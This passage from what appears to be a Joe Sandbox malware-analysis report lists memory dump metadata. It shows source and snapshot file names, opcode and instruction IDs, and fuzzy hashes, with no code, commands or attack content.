                                                                                                  • Instruction Fuzzy Hash: 8CF0DDA6A822525FDB1E5FA94C561CCF771ED47330300166ACC68AF2D2CB208043CB99
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Y_\
                                                                                                  • API String ID: 0-1403553263
                                                                                                  • Opcode ID: 40bb612a1c3f4303449e63de0b91854fc0fd1d5d01edf2796c76b830b0f24c35
                                                                                                  • Instruction ID: cfd1fd2e5eba884802ac8f8b04c1c329327db0dca81681e4c0128d488444c7b3
                                                                                                  • Opcode Fuzzy Hash: 40bb612a1c3f4303449e63de0b91854fc0fd1d5d01edf2796c76b830b0f24c35
                                                                                                  • Instruction Fuzzy Hash: D1F059A7942A05AEC719DF6498411A8F7B0FE1A321B501AABC994EB222D7618003C705
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Y_\
                                                                                                  • API String ID: 0-1403553263
                                                                                                  • Opcode ID: 3f4d4e6818103ab86606e39b3da1e72d9a6371ea5d90a9a20e8e85da95b9765d
                                                                                                  • Instruction ID: 9a7c76ca60454809eaa394b71fdf0ee1e307e6b28cff4d4b2629d15cdc3fb008
                                                                                                  • Opcode Fuzzy Hash: 3f4d4e6818103ab86606e39b3da1e72d9a6371ea5d90a9a20e8e85da95b9765d
                                                                                                  • Instruction Fuzzy Hash: 7EE020577961112B571D6D8A9C220EDF315E94B7713C05711D965E71D1CF10C04783DD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 35e07bea7b8b9f412cca71389c7feb0d641bbf466193ac3b62d3737de9943af1
                                                                                                  • Instruction ID: 7af91ad2353bd0c486f1d34ad7bc475749e4060182da115a1c72d059dd389c25
                                                                                                  • Opcode Fuzzy Hash: 35e07bea7b8b9f412cca71389c7feb0d641bbf466193ac3b62d3737de9943af1
                                                                                                  • Instruction Fuzzy Hash: 31113531DCD2A55EC3295F7448C5197BBAADE53354B2401AEC480DF4D2D311C447C3C6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a1924b8a1ae5424196cd789fc9f19c51ca2f3658024730e582d0d48a8fe5c128
                                                                                                  • Instruction ID: 8eac1bf33da036a126aa1078dd8f7498f9b08cf6bec4bedc45e886fbb50f97b2
                                                                                                  • Opcode Fuzzy Hash: a1924b8a1ae5424196cd789fc9f19c51ca2f3658024730e582d0d48a8fe5c128
                                                                                                  • Instruction Fuzzy Hash: 2CA01123F820080000280C8A3A020B0E32AC2C3032E0232F3CE0CB30000823C820028C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7cbf4b3511f298f2ac589b85da928dface6d4b5e81fa88c034b727f4e1e23d31
                                                                                                  • Instruction ID: 4739d571d05dd45f17d6c9d1766b28dd8f3f52519e0c9eea95233e55d65d6490
                                                                                                  • Opcode Fuzzy Hash: 7cbf4b3511f298f2ac589b85da928dface6d4b5e81fa88c034b727f4e1e23d31
                                                                                                  • Instruction Fuzzy Hash: 32B01217E4950400C0304E0878000B5F378D18B136E207BE7CC4C734001553C01001CC